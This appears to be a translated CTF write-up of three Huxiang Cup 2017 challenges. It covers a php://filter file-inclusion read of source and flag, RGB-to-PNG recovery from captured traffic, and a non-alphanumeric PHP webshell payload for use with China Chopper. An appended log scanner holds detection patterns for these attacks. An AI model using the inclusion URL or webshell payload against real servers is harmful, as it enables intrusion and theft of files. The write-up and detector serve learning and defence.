hxb 2017: Partial Write-up
Source: Internet. Editor: 程序博客网. Time: 2024/06/06 08:37
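0x00 Preface
As a noob, I squeezed out a little time to work on this year's Huxiang Cup (湖湘杯). I only looked at the challenges when it was almost over and solved just three of them, which I am sharing here.
0x01 Challenge 1: web200
At first I assumed this challenge was about file upload, but the few methods I tried did not work. Clicking around, I noticed the op parameter in the URL and suspected a PHP file inclusion vulnerability.
I tried it and obtained the source of index.php.
0x02 Reading the source with php://filter
When fetching source through the php://filter protocol, note that "resource=index" must not carry a file extension here. The index source confirms that no extension is needed, because the code appends it.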
<?php
error_reporting(0);
define('FROM_INDEX', 1);

$op = empty($_GET['op']) ? 'home' : $_GET['op'];
// Only a non-string value or ".." is rejected; wrappers such as php:// pass this check.
if(!is_string($op) || preg_match('/\.\./', $op))
    die('Try it again and I will kill you! I freaking hate hackers!');
ob_start('ob_gzhandler');

function page_top($op) {
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
    <div id="header">
        <center><a href="?op=home" class="logo"><img src="images/logo.jpg" alt=""></a></center>
    </div>
    <div id="body">
<?php
}

function fatal($msg) {
?>
<div class="article"><h2>Error</h2><p><?=$msg;?></p></div>
<?php
exit(1);
}

function page_bottom() {
?>
    </div>
    <center>
        <div id="footer">
            <div>
                <p>
                    <span>2017 © </span> All rights reserved.
                </p>
            </div>
        </div>
    </center>
</body>
</html>
<?php
ob_end_flush();
}

register_shutdown_function('page_bottom');
page_top($op);
// ".php" is appended here, which is why resource=index carries no extension.
if(!(include $op . '.php'))
    fatal('no such page');
?>
0x03 Getting the flag
Entering flag.php in the URL shows that the file exists, so read its source directly to get the flag.
http://114.215.129.72:10080/?op=php://filter/read=convert.base64-encode/resource=flag
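0x04 Challenge 2: MISC traffic analysis
Looking through the HTTP streams reveals a flag.zip.
Follow the TCP stream, paste the hex of flag.zip into WinHex, and save it as flag.zip.
Extracting it yields a ce.txt.
When I opened it I first thought it was a QR code, but after a long time I got nowhere. Later I realized it was RGB values from which a PNG image can be restored.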
cat -n ce.txt | tail -n 1
 98457  254, 255, 255
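This shows there are 98457 lines in total, which can form an 887x111 image (in images like this the flag is usually one long string, so I tried these dimensions).
Use a script to generate the PNG image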
#! /usr/bin/python2.7
from PIL import Image

x = 887   # image width
y = 111   # image height
im = Image.new('RGB', (x, y))

# ce.txt holds one "R, G, B" triple per line, stored column by column.
with open('ce.txt') as f:
    for i in range(0, x):
        for j in range(0, y):
            line = f.readline()
            lst = line.split(',')
            im.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))

im.show()
im.save('flag.png')
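0x05 Challenge 3: web300
After some testing: letters, digits and some symbols are filtered, and a webshell has to be uploaded.
I found an article by P牛 that describes a webshell built on type conversion.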
Payload
http://114.215.133.202:10080/?content=$_=%27%27;$_[%2b$_]%2b%2b;$_=$_.%27%27;$__=$_[%2b%27%27];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____=%27_%27;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);
Connect with 菜刀 (China Chopper); the password is "_".
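Seen from the defender's side, both web challenges leave traces in the access log: web200 (0x01 to 0x03) puts a stream wrapper in the op parameter, and web300 (0x05) sends code that contains no letters or digits in content. The following is an added example, not part of the original write-up or the challenge code; the log lines are constructed, and the function names, wrapper list and 20-character threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Wrapper schemes PHP can open via include/fopen (this list is an assumption; extend it).
WRAPPER_RE = re.compile(r"^(?:(?:php|phar|zip|expect|glob|file|ftp|https?)://|data:)", re.I)
ALNUM_RE = re.compile(r"[A-Za-z0-9]")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def query_params(target):
    """Yield decoded (name, value) pairs; split on '&' only so ';' stays in the value."""
    for pair in target.partition("?")[2].split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name), unquote_plus(value)

def classify(target):
    """Return sorted (parameter, finding) pairs for one request target."""
    findings = set()
    for name, value in query_params(target):
        if WRAPPER_RE.match(value.strip()):
            findings.add((name, "stream-wrapper"))    # e.g. op=php://filter/...
        if ".." in value:
            findings.add((name, "path-traversal"))    # the one pattern index.php rejects
        # Code-like value: PHP variable sigils but not a single letter or digit.
        if len(value) >= 20 and "$_" in value and not ALNUM_RE.search(value):
            findings.add((name, "non-alphanumeric-php"))
    return sorted(findings)

def scan(log_lines):
    """Return (line number, parameter, finding) for every flagged request."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((lineno, n, kind) for n, kind in classify(match.group(1)))
    return hits

# Constructed access-log lines (documentation-range client addresses, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2017:10:01:02 +0800] "GET /?op=home HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2017:10:01:09 +0800] "GET /?op=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2017:10:02:30 +0800] "GET /?op=%70hp%3A%2F%2Ffilter/resource=flag HTTP/1.1" 200 96',
    '203.0.113.9 - - [01/Jan/2017:10:05:44 +0800] "GET /?content=$_=%27%27;$_[%2b$_]%2b%2b;$__%2b%2b;$___.=$__; HTTP/1.1" 200 20',
    '203.0.113.9 - - [01/Jan/2017:10:06:00 +0800] "GET /?content=hello%20world HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Values are URL-decoded before matching, so the percent-encoded wrapper on the third sample line is flagged the same way as the plain one.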